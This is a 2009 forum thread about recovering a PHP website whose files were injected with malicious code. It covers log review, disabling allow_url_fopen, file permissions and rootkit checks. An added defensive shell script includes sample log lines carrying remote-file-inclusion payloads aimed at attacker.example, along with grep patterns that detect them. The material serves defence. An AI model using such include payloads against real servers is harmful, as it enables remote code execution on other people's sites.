dflow Posted October 12, 2009
I was attacked by a redirect PHP injection. My PC is clean of viruses, so I figure that either my hosting server was hacked or that my PHP was hacked. The hack was an injection of some redirect eval(gikljhoihdalnbd) bullshit and an injection into the bottom end of all JS files. Anyone experience this kind of hack before? And if so, what can I do to prevent it?
gizmola Posted October 12, 2009
I'm not sure what you mean by redirect PHP injection. I'm also not sure what you mean about your JavaScript files. Were they physically changed on the server so that they now include the cracker's bad JavaScript? The only way to figure out what happened is to analyze the system and the logs. Is allow_url_fopen = On set in your php.ini?
dflow Posted October 14, 2009 (Author)
> I'm not sure what you mean by redirect PHP injection. I'm also not sure what you mean about your JavaScript files. Were they physically changed on the server so that they now include the cracker's bad JavaScript? The only way to figure out what happened is to analyze the system and the logs. Is allow_url_fopen = On set in your php.ini?

Yes, it is on. I found changes in the PHP files, and the JavaScripts now include a line from the cracker.
GKWelding Posted October 14, 2009
If physical files on your server have been changed, then I would say it's more likely the web server has been compromised than the code.
dflow Posted October 14, 2009 (Author)
> If physical files on your server have been changed, then I would say it's more likely the web server has been compromised than the code.

I thought maybe I had a virus that attacked my FTP client and uploaded it, got my password, etc., but no viruses.
gizmola Posted October 15, 2009
I don't agree at all; simple code mistakes and permissions issues could explain what happened. This is why looking at your web logs is important. Here are my thoughts. First, turn allow_url_fopen off for now. What that does is allow you to specify URLs in all sorts of places, including requires and includes. This is referred to as remote execution. If they can find any script that builds require or include paths in an insecure way, they can trick your server into reading code from their server. Setting allow_url_fopen to Off will turn this off for now. Secondarily, modify your permissions on the code directories so that they don't allow write for Apache. Replace all the original scripts and JavaScripts, and in the meantime start poring over and grepping your logs looking for weird URLs and in particular anything that includes http://notyourserver in URLs. Also make sure you look in your tmp directory. Often rootkits will be deposited initially in there. If you believe there's a chance you were rootkitted, you need to find out ASAP. Since they seemed to want to exploit your site and don't mind you knowing it, this might bode well for you, as usually they rootkit in order to turn your server into an FTP repo, spam relay, or shadow website. They'll often start up connections to an IRC server in order to remote control it via an IRC channel. If this is a Red Hat/CentOS based server, you have the great tool of rpm to help figure this out; since all the package contents have MD5 hashes, you can use rpm to look at the basic packages that a rootkit will screw with, the ones that go after login, ps, sshd, etc. lsof is a great tool, but sometimes that gets rootkitted too. Again, if it's possible for now, disable PHP uploads until you figure out what has happened. Try and lock down the server as much as possible while you're doing this. Are you running any standard packages (phpBB, WordPress, etc.) on the server that might be the source of the exploit? More often than not, exploits are the result of script kiddies who are running an exploit against a particular package. It's very important to figure this out, and patch any holes, or you'll get exploited again.
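An added example, not code from anyone in the thread: a POSIX shell script that does the two checks gizmola describes above, grepping an access log for request URLs that carry a remote http:// parameter (the pattern an insecure include turns into remote execution when allow_url_fopen is On) and listing PHP/JS files that contain an eval( call like the one dflow found. The log lines, IPs and the attacker.example host are constructed, and the base64_decode( pattern is an assumption, not something the thread reports.

```shell
#!/bin/sh
# Constructed sample access-log lines (not from the thread). Two are ordinary
# requests; two pass a remote URL in a query parameter, which an include or
# require built from that parameter would fetch when allow_url_fopen is On.
SAMPLE_LOG='203.0.113.5 - - [14/Oct/2009:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [14/Oct/2009:10:02:11 +0000] "GET /index.php?page=http://attacker.example/x.txt? HTTP/1.1" 200 1024
198.51.100.9 - - [14/Oct/2009:10:03:30 +0000] "GET /js/main.js HTTP/1.1" 200 2048
203.0.113.7 - - [14/Oct/2009:10:04:45 +0000] "GET /inc/lib.php?path=https%3A%2F%2Fattacker.example%2Fy HTTP/1.1" 200 900'

# Print request lines whose query string carries an http/https/ftp URL,
# literal or URL-encoded (%3A%2F%2F). Reads stdin: find_rfi_requests < access.log
find_rfi_requests() {
    grep -Ei '"(GET|POST) [^" ]*[?][^" ]*(https?|ftp)(://|%3a%2f%2f)'
}

# Number of suspicious request lines in the constructed sample.
count_rfi_in_sample() {
    printf '%s\n' "$SAMPLE_LOG" | find_rfi_requests | wc -l | tr -d ' '
}

# List .php and .js files under DIR that contain eval( (what dflow saw) or
# base64_decode( (assumed common companion). Compare every hit against a
# clean copy of the file rather than trusting the match on its own.
find_injected_files() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' \) -exec \
        grep -lE '(eval|base64_decode)[[:space:]]*\(' {} +
}

# Stand-alone run: scan the sample log, then the current directory tree.
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | find_rfi_requests
    find_injected_files .
fi
```

Run it with `--demo` from the web root, or feed the real access log into find_rfi_requests; once the rogue files are identified, restore them from backup and fix the include that accepted the URL, as the post above recommends.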
Gayner Posted October 15, 2009
PHP is server side. How can people hack it unless you've got admins of your servers that hate you? Am I correct, broh?
gizmola Posted October 15, 2009
> PHP is server side. How can people hack it unless you've got admins of your servers that hate you? Am I correct, broh?

No, as I just explained, the most common way people get exploited is via script kiddies who are exploiting a vulnerability in a particular package. When you have custom software, that requires someone to really do a lot of testing on an app where they don't have the source code. They can try some things, but they're just guessing. Compare that with something like phpBB. There are tens of thousands of sites running phpBB, so if someone finds an exploit in it, and puts it into an exploit script, they can easily use Google to identify a long list of potential victims and then let their bot just run through those, letting the exploit kit do the work. There's absolutely no thought put into it, and they don't know you, nor do they care who you are. I have a site, for example, that is somewhat old and has a contact form. Every single day I get emails from this contact form that have a bunch of links in them. Clearly there is nothing to be gained from someone posting a form with a bunch of links to offshore Viagra sites that will simply be cleaned out by my spam filter. I continue to receive these because it's a bot doing the sending that is simply looking for forms and attempting to stick in links and post them. A simple CAPTCHA easily defeats this, but I've been too lazy to add it to the contact form. With that said, it is in no way personal that spammers continue to send these emails day in and day out. If they did, they would quickly realize that it is a complete waste of time to post these to a contact form.
dflow Posted October 19, 2009 (Author)
Thanks, I'll go over my logs. I updated Avast regarding this exploit, so at least now I get an alert. The site has been stable for a few days, so I did something right: changed FTP codes after backup, turned off allow_url_fopen, also changed FTP client.